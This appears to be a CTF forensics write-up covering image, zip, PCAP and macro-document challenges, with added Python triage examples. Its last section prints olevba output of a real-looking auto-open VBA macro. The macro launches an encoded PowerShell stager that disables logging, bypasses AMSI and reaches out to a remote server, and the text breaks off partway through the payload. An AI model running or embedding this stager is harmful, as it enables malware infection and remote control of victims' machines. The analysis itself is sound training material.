DerbyCon 9 – DomainTools CTF – Forensics

Part two of the DerbyCon DomainTools CTF write-ups.  You can find yesterday’s coverage of all the Crypto challenges here.  I’ll be contributing solutions for every challenge in the CTF, broken up by the same section names that they used.  When possible, I’ll also be creating CyberChef recipes to directly solve each challenge, and linking to them following the solution description.  Today: the forensics challenges!

Challenge: Doggo Secrets (10 Points)

Directions: Can you extract the secret flag from this file?

File: oh_hi

Solution:

First, unzip…

user@system:~$ unzip oh_hi.zip
Archive: oh_hi.zip
inflating: oh_hi.gpj
creating: __MACOSX/
inflating: __MACOSX/._oh_hi.gpj

So only one file, with an extension of ‘gpj’.  That kind of looks like jpg backwards…

user@system:~$ file oh_hi.gpj
oh_hi.gpj: JPEG image data, JFIF standard 1.01, aspect ratio, density 216x216, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5, orientation=upper-left, xresolution=74, yresolution=82, resolutionunit=2], baseline, precision 8, 1125x1036, components 3

Probably because it is!  Let’s fix that to make it easier for common tools.

user@system:~$ mv oh_hi.gpj oh_hi.jpg

So what is in this JPG?

user@system:~$ eog oh_hi.jpg

Written on the image is the flag:

DT_CTF_123!@#

Challenge: Noise To Signal (20 Points)

Directions: Can you find the flag inside this noisy file?

File: blah (Note: zipped here but originally just raw text)

Solution:  Just look through the file until you find the answer, or use an online tool to break the text up for easier analysis (e.g. https://www.online-utility.org/text/analyzer.jsp)

phisheye

Challenge: Sweet logo, dude! (20 Points)

Directions: Find the flag in the DomainTools logo!

File: logo (Note: zipped here but originally just the JPG)

Solution:  Anytime I’m dealing with a challenge like this I like to just binwalk and see if there’s anything weird from a file perspective, so I give that a try before going after other steganographic options:

user@system:~$ binwalk -z logo.jpg

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
30            0x1E            TIFF image data, little-endian offset of first image directory: 8
26769         0x6891          Zip archive data, at least v1.0 to extract, compressed size: 16, uncompressed size: 16, name: hmmm.txt
26929         0x6931          End of Zip archive, footer length: 22

Okay, so we have a Zip file appended to the end of the JPG… a pretty common technique, since the two formats coexist without bothering each other: a JPEG decoder stops at the EOI marker and ignores whatever follows, while a Zip reader locates the archive from the end-of-central-directory record at the tail of the file.  I could use ‘dd’ and the offset to carve out exactly the ZIP archive, but since neither format impacts the other it’s easier to just rename the file with a ‘.zip’ extension and treat it like a plain archive:

user@system:~$ mv logo.jpg logo.zip
user@system:~$ unzip logo.zip
Archive: logo.zip
warning [logo.zip]: 26769 extra bytes at beginning or within zipfile
(attempting to process anyway)
extracting: hmmm.txt

So, what’s in our ‘hmmm.txt’ file?

user@system:~$ cat hmmm.txt
FKWcp1W1oTImZGVm

After trying to submit that value and getting told ‘no’ it’s time to see what other trickery may be present.  The next obvious thing to try is to Base64 decode it, but that also brings no joy.

After messing around for some time with possible permutations, I finally tried ROT13 then Base64 decode (CyberChef recipe), which gives the answer:

IrisRules123
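
The two checks from the last two challenges, the magic-byte sniff that caught the renamed ‘gpj’ in Doggo Secrets and the appended-archive carve plus ROT13/Base64 decode from this one, in a single Python script. This is an added example, not code from the write-up or from DomainTools: the JPEG/zip polyglot it works on is constructed inside the script (the real logo.jpg is not reproduced), and the offset arithmetic in find_appended_zip is exactly what produces the ‘26769 extra bytes at beginning’ warning unzip printed above.

```python
import base64
import codecs
import io
import struct
import zipfile

# Constructed sample, not the real logo.jpg: a minimal JPEG (SOI, one APP0
# segment, EOI) with a zip archive glued on the end. The archive's hmmm.txt
# carries the same string the challenge used.
def build_sample_polyglot() -> bytes:
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    jpeg = (b"\xff\xd8" + b"\xff\xe0" + struct.pack(">H", len(app0) + 2)
            + app0 + b"\xff\xd9")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("hmmm.txt", "FKWcp1W1oTImZGVm")
    return jpeg + buf.getvalue()

# Sniff the real type from leading magic bytes, the way `file` does, so a
# renamed extension (oh_hi.gpj) cannot hide what the bytes actually are.
MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"PK\x03\x04": "zip",
    b"%PDF-": "pdf",
}
EXT_TO_TYPE = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png",
               "zip": "zip", "pdf": "pdf"}

def sniff_type(data: bytes) -> str:
    for sig, name in MAGIC.items():
        if data.startswith(sig):
            return name
    return "unknown"

def extension_matches(filename: str, data: bytes) -> bool:
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return EXT_TO_TYPE.get(ext) == sniff_type(data)

def find_appended_zip(data: bytes):
    """Offset at which an appended zip begins, or None.

    The End Of Central Directory record stores where the central directory
    should be, relative to the archive start. When the archive was appended
    to another file the directory really sits further in; the difference is
    the length of the leading data (what unzip reports as 'extra bytes at
    beginning').
    """
    eocd = data.rfind(b"PK\x05\x06")
    if eocd < 0:
        return None
    cd_size, cd_offset = struct.unpack_from("<II", data, eocd + 12)
    prefix = (eocd - cd_size) - cd_offset
    if prefix < 0 or data[prefix:prefix + 4] != b"PK\x03\x04":
        return None
    return prefix

def carve_zip_members(data: bytes) -> dict:
    """Carve the appended archive and return {member name: bytes}."""
    start = find_appended_zip(data)
    if start is None:
        return {}
    with zipfile.ZipFile(io.BytesIO(data[start:])) as zf:
        return {name: zf.read(name) for name in zf.namelist()}

def _printable_ascii(b: bytes) -> bool:
    return len(b) > 0 and all(32 <= c < 127 for c in b)

def try_decodings(s: str):
    """Try the decode chains in the order the write-up did and return the
    first (chain name, text) whose output is printable ASCII, else None."""
    chains = [
        ("base64", lambda t: base64.b64decode(t)),
        ("rot13+base64", lambda t: base64.b64decode(codecs.decode(t, "rot_13"))),
    ]
    for name, fn in chains:
        try:
            out = fn(s)
        except ValueError:          # binascii.Error is a ValueError
            continue
        if _printable_ascii(out):
            return name, out.decode("ascii")
    return None

if __name__ == "__main__":
    blob = build_sample_polyglot()
    print("type:", sniff_type(blob), "| extension ok:", extension_matches("logo.gpj", blob))
    print("zip starts at byte", find_appended_zip(blob))
    members = carve_zip_members(blob)
    print(try_decodings(members["hmmm.txt"].decode("ascii").strip()))
```

On the constructed sample the prefix works out to 22 bytes (the tiny JPEG); on the real logo.jpg the same arithmetic yields the 26769 that binwalk and unzip both reported. The decode order in try_decodings deliberately mirrors the write-up: plain Base64 is tried first and rejected because its output contains control bytes, and ROT13-then-Base64 is the first chain that yields printable text.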

Challenge: Hack the Hacker (25 Points)

Directions:  Your incident response team notifies you that a user on your network appears to be flooding an internal web server with authentication attempts.

They’ve taken a PCAP to give to you for your investigation. Determine if the insider threat successfully accessed the web server.

The flag is the correct password!

File: insider.pcapng

Solution:

After unzipping and finding the single file (insider.pcapng), open it up with Wireshark.  We find a ton of noise and traffic, everything from Mozilla updates to standard Internet browsing.  We were told that it was an internal web server though, so using the conversation filter we can see that the most likely candidate based on volume of traffic (it is a brute force, after all) is ‘192.168.152.135’.  On the not-very-realistic front, the attempts are coming from that same address, so our purported hacker is rather inept if they’re brute forcing to get admin on a system they’re already on.

As we look at those communications we can see that the attempts are being made with Basic authentication over HTTP… and now we have everything we need to build a filter to get rid of that excess noise:

ip.src==192.168.152.135 && ip.dst==192.168.152.135 && http

That still leaves a LOT of attempts… so let’s search for a 200 OK response, which would follow a successful login, instead of the 401 Unauthorized responses. We find the first one at packet 176513… and if you’re wondering how to find it quickly, just sort on the Info field and look for where the value changes from ‘GET / HTTP/1.1’ to ‘HTTP/1.0 401 Unauthorized’; you’ll see it in between the two. 🙂

We can then just follow that HTTP stream (right click on packet –> Follow –> HTTP Stream) and see that the authentication attempt that was accepted had this header:

Authorization: Basic emVyb2Nvb2w6aGFja2Vy

Basic authorization is just Base64, so…

user@system:~$ echo "emVyb2Nvb2w6aGFja2Vy" | base64 -d
zerocool:hacker

The format of Basic authentication is “username:password” so our answer is:

hacker
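
An added example, not part of the write-up, that does the same triage programmatically: a small parser over HTTP request/response pairs that counts 401s per source, decodes the Basic credential and reports the attempt that got a 2xx, which is the detection logic an IR team would rather run than scroll through 176k packets. The traffic is constructed inline, with the page’s ‘zerocool’ header as the successful attempt; a real deployment would feed it pairs pulled from the PCAP with tshark or a pcap library, which this script assumes rather than includes.

```python
import base64
import binascii
from collections import Counter, defaultdict

def _b64(raw: bytes) -> str:
    return base64.b64encode(raw).decode("ascii")

# Constructed sample traffic, not the challenge PCAP: a run of Basic-auth
# attempts from one host that ends in a success, plus an unrelated request.
# Each tuple is (src, dst, raw request, raw response).
SAMPLE_EXCHANGES = [
    ("192.168.152.135", "192.168.152.135",
     f"GET / HTTP/1.1\r\nHost: intranet\r\nAuthorization: Basic {_b64(b'zerocool:' + guess)}\r\n\r\n",
     'HTTP/1.0 401 Unauthorized\r\nWWW-Authenticate: Basic realm="admin"\r\n\r\n')
    for guess in (b"123456", b"password", b"letmein", b"qwerty")
] + [
    ("192.168.152.135", "192.168.152.135",
     "GET / HTTP/1.1\r\nHost: intranet\r\nAuthorization: Basic emVyb2Nvb2w6aGFja2Vy\r\n\r\n",
     "HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n<html>admin</html>"),
    ("192.168.152.10", "192.168.152.135",
     "GET /index.html HTTP/1.1\r\nHost: intranet\r\n\r\n",
     "HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n<html>hi</html>"),
]

def parse_basic_auth(request: str):
    """(user, password) from a Basic Authorization header, else None."""
    headers = request.split("\r\n\r\n", 1)[0].split("\r\n")[1:]
    for line in headers:
        name, sep, value = line.partition(":")
        if not sep or name.strip().lower() != "authorization":
            continue
        scheme, _, token = value.strip().partition(" ")
        if scheme.lower() != "basic":
            return None
        try:
            creds = base64.b64decode(token.strip(), validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            return None
        user, _, password = creds.partition(":")   # RFC 7617: user:password
        return user, password
    return None

def status_code(response: str):
    """Numeric status from an HTTP status line, else None."""
    parts = response.split("\r\n", 1)[0].split(" ")
    if len(parts) >= 2 and parts[0].startswith("HTTP/") and parts[1].isdigit():
        return int(parts[1])
    return None

def analyze(exchanges, threshold: int = 3) -> dict:
    """Count 401s per (src, dst) pair and record each 2xx that follows an
    attempted Basic login, with how many failures preceded it."""
    failures = Counter()
    users_tried = defaultdict(set)
    successes = []
    for src, dst, req, resp in exchanges:
        creds = parse_basic_auth(req)
        if creds is None:
            continue                     # no Basic header: not an attempt
        key = (src, dst)
        code = status_code(resp)
        if code == 401:
            failures[key] += 1
            users_tried[key].add(creds[0])
        elif code is not None and 200 <= code < 300:
            successes.append({"src": src, "dst": dst, "user": creds[0],
                              "password": creds[1],
                              "failures_before": failures[key]})
    flagged = {k: n for k, n in failures.items() if n >= threshold}
    return {"flagged": flagged, "successes": successes,
            "users_tried": {k: sorted(v) for k, v in users_tried.items()}}

if __name__ == "__main__":
    report = analyze(SAMPLE_EXCHANGES)
    for (src, dst), n in report["flagged"].items():
        print(f"{src} -> {dst}: {n} failed Basic-auth attempts, users {report['users_tried'][(src, dst)]}")
    for s in report["successes"]:
        print(f"success for {s['user']} from {s['src']} after {s['failures_before']} failures")
```

Keying on (src, dst) rather than source alone is what lets the filter above (same address on both sides) still work; the threshold is the knob to tune against normal users mistyping a password a couple of times.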

Challenge: Hire the Hacker (30 Points)

Directions: You’ve come across a resume for a solid pentester you’re hiring for. The flag is the domain!

File: DadeResume (Note: zipped here but originally just .docm file)

Solution:  Modern (i.e. Office 2007 and later) Word documents are just Zip files, so to start let’s rename this, unzip it, and see what’s inside:

user@system:~$ mv DadeResume.docm DadeResume.zip
user@system:~$ mkdir Dade
user@system:~$ cd Dade/
user@system:~/Dade$ mv ../DadeResume.zip .
user@system:~/Dade$ unzip DadeResume.zip
Archive: DadeResume.zip
inflating: [Content_Types].xml
inflating: _rels/.rels
inflating: word/_rels/document.xml.rels
inflating: word/document.xml
inflating: word/footnotes.xml
inflating: word/header1.xml
inflating: word/footer1.xml
{...}

This is a .docm file, which means embedded macros, so let’s check out the standard location for those: the ‘word’ directory.  We find the VBA project under its default name, ‘vbaProject.bin’.

Unfortunately, viewing the vbaProject.bin file isn’t exactly easy, because it’s an OLE (compound) file… but on the plus side there’s a helper Python library and set of tools for that (when isn’t there?)!
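
Before reaching for olevba, a first-pass triage of an OOXML file takes a few lines of Python with only the standard library: open the zip, read [Content_Types].xml to see what the package claims to be, and look for a VBA project part. This added example (not the author’s code and not oletools) builds two constructed packages, one docm-like carrying a vbaProject.bin and one plain docx-like, and triages both; the content-type strings are the real OOXML ones, the package contents are stand-ins.

```python
import io
import zipfile

# Content types that mark a macro-enabled OOXML main part, and the type of
# the VBA project part itself.
MACRO_MAIN_TYPES = {
    "application/vnd.ms-word.document.macroEnabled.main+xml": "docm",
    "application/vnd.ms-word.template.macroEnabledTemplate.main+xml": "dotm",
    "application/vnd.ms-excel.sheet.macroEnabled.main+xml": "xlsm",
    "application/vnd.ms-powerpoint.presentation.macroEnabled.main+xml": "pptm",
}
VBA_PART_TYPE = "application/vnd.ms-office.vbaProject"
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # compound file header

def build_sample_package(with_macros: bool) -> bytes:
    """Constructed stand-in for DadeResume.docm (macros) or a plain .docx."""
    main_type = ("application/vnd.ms-word.document.macroEnabled.main+xml" if with_macros
                 else "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml")
    parts = [
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>',
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">',
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>',
        '<Default Extension="xml" ContentType="application/xml"/>',
        f'<Override PartName="/word/document.xml" ContentType="{main_type}"/>',
    ]
    if with_macros:
        parts.append(f'<Override PartName="/word/vbaProject.bin" ContentType="{VBA_PART_TYPE}"/>')
    parts.append("</Types>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "".join(parts))
        zf.writestr("_rels/.rels", "<Relationships/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macros:
            # a real VBA project is an OLE container; here only the header is real
            zf.writestr("word/vbaProject.bin", OLE_MAGIC + b"\x00" * 504)
    return buf.getvalue()

def triage_office_package(data: bytes) -> dict:
    """Answer the first questions an analyst asks of an Office file: is it an
    OOXML zip, what does it declare itself to be, and does it carry VBA?"""
    result = {"is_ooxml_zip": False, "declared_kind": None,
              "vba_parts": [], "vba_is_ole": False, "has_macros": False}
    if not data.startswith(b"PK\x03\x04"):
        return result
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if "[Content_Types].xml" not in names:
            return result
        result["is_ooxml_zip"] = True
        types_xml = zf.read("[Content_Types].xml").decode("utf-8", "replace")
        for ctype, kind in MACRO_MAIN_TYPES.items():
            if ctype in types_xml:
                result["declared_kind"] = kind
        # Look for the VBA project by name regardless of what the package
        # declares: a vbaProject.bin inside a "docx" is worth a second look.
        result["vba_parts"] = [n for n in names if n.lower().endswith("vbaproject.bin")]
        result["vba_is_ole"] = any(zf.read(n).startswith(OLE_MAGIC)
                                   for n in result["vba_parts"])
    result["has_macros"] = bool(result["vba_parts"])
    return result

if __name__ == "__main__":
    for label, pkg in (("docm-like", build_sample_package(True)),
                       ("docx-like", build_sample_package(False))):
        print(label, triage_office_package(pkg))
```

The result is only a pointer to where the macro lives; extracting and reading the code is still olevba’s job, as the write-up goes on to show.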

user@system:~/Dade/word$ sudo pip install -U oletools
[sudo] password for user:
The directory '/home/user/.cache/pip/http' or its parent directory is not owned by the current user and the cache has been disabled. Please check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
The directory '/home/user/.cache/pip' or its parent directory is not owned by the current user and caching wheels has been disabled. check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
Collecting oletools
Downloading https://files.pythonhosted.org/packages/6a/f4/33710cf46f4b3dd9fecbf22cebf744a61d65ce653b458e50134010473271/oletools-0.54.2.zip (3.1MB)
100% |████████████████████████████████| 3.1MB 547kB/s
Collecting colorclass (from oletools)
Downloading https://files.pythonhosted.org/packages/37/ea/ae8dbb956939d4392e6a7fdef87fda273854da1128edae016c4104240be8/colorclass-2.2.0.tar.gz
Collecting easygui (from oletools)
Downloading https://files.pythonhosted.org/packages/89/b5/fd22bb3eb36085aeb7781670bbc59cf8b641b1774f77578ec06368865aa3/easygui-0.98.1-py2.py3-none-any.whl (90kB)
100% |████████████████████████████████| 92kB 3.6MB/s
Collecting msoffcrypto-tool (from oletools)
Downloading https://files.pythonhosted.org/packages/c5/68/58628967bc5328b22706c74081df4564e853ee68f4dafd6d77e329ae56e8/msoffcrypto-tool-4.10.1.tar.gz (209kB)
100% |████████████████████████████████| 215kB 442kB/s
Collecting olefile>=0.46 (from oletools)
Downloading https://files.pythonhosted.org/packages/34/81/e1ac43c6b45b4c5f8d9352396a14144bba52c8fec72a80f425f6a4d653ad/olefile-0.46.zip (112kB)
100% |████████████████████████████████| 112kB 3.3MB/s
Collecting pyparsing>=2.2.0 (from oletools)
Downloading https://files.pythonhosted.org/packages/11/fa/0160cd525c62d7abd076a070ff02b2b94de589f1a9789774f17d7c54058e/pyparsing-2.4.2-py2.py3-none-any.whl (65kB)
100% |████████████████████████████████| 71kB 8.7MB/s
Requirement already satisfied, skipping upgrade: cryptography>=2.3 in /usr/lib/python2.7/dist-packages (from msoffcrypto-tool->oletools) (2.3)
Installing collected packages: colorclass, easygui, olefile, msoffcrypto-tool, pyparsing, oletools
Running setup.py install for colorclass ... done
Running setup.py install for olefile ... done
Running setup.py install for msoffcrypto-tool ... done
Running setup.py install for oletools ... done
Successfully installed colorclass-2.2.0 easygui-0.98.1 msoffcrypto-tool-4.10.1 olefile-0.46 oletools-0.54.2 pyparsing-2.4.2

Now let’s dump that code!

user@system:~/Dade/word$ olevba vbaProject.bin
olevba 0.54.2 on Python 2.7.16 - http://decalage.info/python/oletools
===============================================================================
FILE: vbaProject.bin
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: vbaProject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO NewMacros.bas
in file: vbaProject.bin - OLE stream: u'VBA/NewMacros'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub Auto_Open()
odK
End Sub

Sub AutoOpen()
odK
End Sub

Sub Document_Open()
odK
End Sub

Public Function odK() As Variant
Dim cxn As String
cxn = "powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVg"
cxn = cxn + "BlAHIAUwBpAE8AbgBUAGEAYgBsAEUALgBQAFMAVgBFAFIAcwBp"
cxn = cxn + "AG8AbgAuAE0AQQBqAG8AUgAgAC0ARwBlACAAMwApAHsAJABkAD"
cxn = cxn + "MAOQA4ADIAPQBbAFIAZQBGAF0ALgBBAFMAcwBlAG0AQgBsAHkA"
cxn = cxn + "LgBHAEUAVABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQ"
cxn = cxn + "BuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBu"
cxn = cxn + "AC4AVQB0AGkAbABzACcAKQAuACIARwBlAHQARgBpAGUAYABsAG"
cxn = cxn + "QAIgAoACcAYwBhAGMAaABlAGQARwByAG8AdQBwAFAAbwBsAGkA"
cxn = cxn + "YwB5AFMAZQB0AHQAaQBuAGcAcwAnACwAJwBOACcAKwAnAG8Abg"
cxn = cxn + "BQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEkARgAo"
cxn = cxn + "ACQARAAzADkAOAAyACkAewAkADkARQA1AGEAYgA9ACQARAAzAD"
cxn = cxn + "kAOAAyAC4ARwBFAHQAVgBBAGwAVQBlACgAJABuAFUAbABsACkA"
cxn = cxn + "OwBJAEYAKAAkADkARQA1AGEAQgBbACcAUwBjAHIAaQBwAHQAQg"
cxn = cxn + "AnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdACkAewAk"
cxn = cxn + "ADkARQA1AEEAQgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG"
cxn = cxn + "8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwA"
cxn = cxn + "ZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZw"
cxn = cxn + "BpAG4AZwAnAF0APQAwADsAJAA5AGUANQBBAGIAWwAnAFMAYwBy"
cxn = cxn + "AGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnAC"
cxn = cxn + "cAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8A"
cxn = cxn + "YwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZw"
cxn = cxn + "AnAF0APQAwAH0AJAB2AEEATAA9AFsAQwBvAEwAbABlAEMAVABJ"
cxn = cxn + "AG8AbgBzAC4ARwBFAG4AZQBSAGkAQwAuAEQAaQBDAHQASQBvAE"
cxn = cxn + "4AQQByAFkAWwBzAFQAcgBJAE4AZwAsAFMAeQBTAHQARQBtAC4A"
cxn = cxn + "TwBCAEoARQBDAHQAXQBdADoAOgBuAEUAVwAoACkAOwAkAHYAQQ"
cxn = cxn + "BMAC4AQQBEAGQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0"
cxn = cxn + "AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcALAAwAC"
cxn = cxn + "kAOwAkAFYAQQBsAC4AQQBEAEQAKAAnAEUAbgBhAGIAbABlAFMA"
cxn = cxn + "YwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbw"
cxn = cxn + "BuAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAOQBFADUAQQBi"
cxn = cxn + "AFsAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE"
cxn = cxn + "4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUA"
cxn = cxn + "cwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcw"
cxn = cxn + "BcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXABTAGMAcgBpAHAAdABC"
cxn = cxn + "ACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAkAF"
cxn = cxn + "YAQQBsAH0ARQBsAHMAZQB7AFsAUwBjAHIASQBQAHQAQgBMAE8A"
cxn = cxn + "YwBrAF0ALgAiAEcARQBUAEYASQBlAGAAbABEACIAKAAnAHMAaQ"
cxn = cxn + "BnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1"
cxn = cxn + "AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAG"
cxn = cxn + "EAbABVAEUAKAAkAG4AdQBsAGwALAAoAE4ARQBXAC0ATwBCAEoA"
cxn = cxn + "ZQBDAFQAIABDAG8ATABMAGUAQwBUAGkATwBOAFMALgBHAGUATg"
cxn = cxn + "BFAFIASQBjAC4ASABBAHMASABTAGUAVABbAFMAdAByAEkATgBH"
cxn = cxn + "AF0AKQApAH0AJABSAGUARgA9AFsAUgBFAGYAXQAuAEEAcwBzAG"
cxn = cxn + "UATQBiAEwAeQAuAEcAZQB0AFQAWQBQAEUAKAAnAFMAeQBzAHQA"
cxn = cxn + "ZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQ"
cxn = cxn + "BhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAk"
cxn = cxn + "AFIAZQBGAC4ARwBFAHQARgBJAGUATABEACgAJwBhAG0AcwBpAE"
cxn = cxn + "kAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIA"
cxn = cxn + "bABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAdABWAEEAbA"
cxn = cxn + "BVAGUAKAAkAE4AVQBsAEwALAAkAFQAUgB1AGUAKQA7AH0AOwBb"
cxn = cxn + "AFMAWQBzAHQARQBtAC4ATgBFAHQALgBTAEUAUgB2AGkAYwBFAF"
cxn = cxn + "AATwBpAG4AVABNAGEATgBBAEcAZQByAF0AOgA6AEUAWABQAGUA"
cxn = cxn + "QwB0ADEAMAAwAEMAbwBuAHQAaQBOAHUARQA9ADAAOwAkADMAOA"
cxn = cxn + "A3AGEAMQA9AE4ARQB3AC0ATwBiAEoARQBjAHQAIABTAFkAcwBU"
cxn = cxn + "AEUAbQAuAE4AZQBUAC4AVwBlAGIAQwBsAGkAZQBOAFQAOwAkAH"
cxn = cxn + "UAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4A"
cxn = cxn + "ZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOw"
cxn = cxn + "AgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAx"
cxn = cxn + "AC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJAAzAD"
cxn = cxn + "gANwBhADEALgBIAGUAQQBEAGUAcgBzAC4AQQBkAEQAKAAnAFUA"
cxn = cxn + "cwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAAzADgANw"
cxn = cxn + "BBADEALgBIAGUAQQBEAEUAcgBTAC4AQQBEAEQAKAAnAFUAcwBl"
cxn = cxn + "AHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAAzADgANwBhAD"
cxn = cxn + "EALgBQAHIATwB4AFkAPQBbAFMAWQBzAFQARQBNAC4ATgBFAFQA"
cxn = cxn + "LgBXAEUAYgBSAEUAUQB1AGUAUwB0AF0AOgA6AEQAZQBGAEEAVQ"
cxn = cxn + "BMAHQAVwBlAGIAUAByAG8AeAB5ADsAJAAzADgANwBhADEALgBQ"
cxn = cxn + "AFIAbwBYAHkALgBDAHIARQBEAEUATgBUAEkAQQBMAHMAIAA9AC"
cxn = cxn + "AAWwBTAHkAcwBUAGUATQAuAE4ARQB0AC4AQwByAGUARABlAE4A"
cxn = cxn + "dABpAEEATABDAEEAYwBIAEUAXQA6ADoARABlAEYAYQB1AGwAdA"
cxn = cxn + "BOAEUAVABXAE8AcgBrAEMAUgBFAEQAZQBuAHQAaQBhAGwAUwA7"
cxn = cxn + "ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAAzAD"
cxn = cxn + "gANwBhADEALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAWQBzAFQA"
cxn = cxn + "RQBNAC4AVABFAFgAdAAuAEUAbgBjAG8ARABJAE4AZwBdADoAOg"
cxn = cxn + "BBAFMAQwBJAEkALgBHAEUAdABCAFkAdABlAFMAKAAnAG0AfQBx"
cxn = cxn + "AG4AWwBPADoAQwB4AD8AMwBBAGkAbAAvAGMAegAxAGIAOABmAH"
cxn = cxn + "AAKwB3ADIAZwBzAHsAWABdAFEATAAnACkAOwAkAFIAPQB7ACQA"
cxn = cxn + "RAAsACQASwA9ACQAQQByAEcAcwA7ACQAUwA9ADAALgAuADIANQ"
cxn = cxn + "A1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAk"
cxn = cxn + "AFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AE"
cxn = cxn + "4AVABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsA"
cxn = cxn + "JABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOw"
cxn = cxn + "AkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7"
cxn = cxn + "ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2AD"
cxn = cxn + "sAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQA"
cxn = cxn + "SABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAFgATwBSACQAUw"
cxn = cxn + "BbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1"
cxn = cxn + "ADYAXQB9AH0AOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAE"
cxn = cxn + "UAbgBjAG8AZABJAG4ARwBdADoAOgBVAG4ASQBDAG8AZABFAC4A"
cxn = cxn + "RwBFAFQAUwBUAHIASQBOAEcAKABbAEMATwBuAHYAZQByAFQAXQ"
cxn = cxn + "A6ADoARgBSAG8ATQBCAEEAcwBFADYANABTAFQAUgBpAE4ARwAo"
cxn = cxn + "ACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAH"
cxn = cxn + "cAQgB6AEEASABVAEEAYwBBAEIAbABBAEgASQBBAGMAdwBCAGwA"
cxn = cxn + "QQBHAHMAQQBjAGcAQgBsAEEASABRAEEAWgBBAEIAdgBBAEcAMA"
cxn = cxn + "BBAFkAUQBCAHAAQQBHADQAQQBMAGcAQgB1AEEARwBVAEEAZABB"
cxn = cxn + "AEEANgBBAEQAWQBBAE4AZwBBADIAQQBEAFkAQQAnACkAKQApAD"
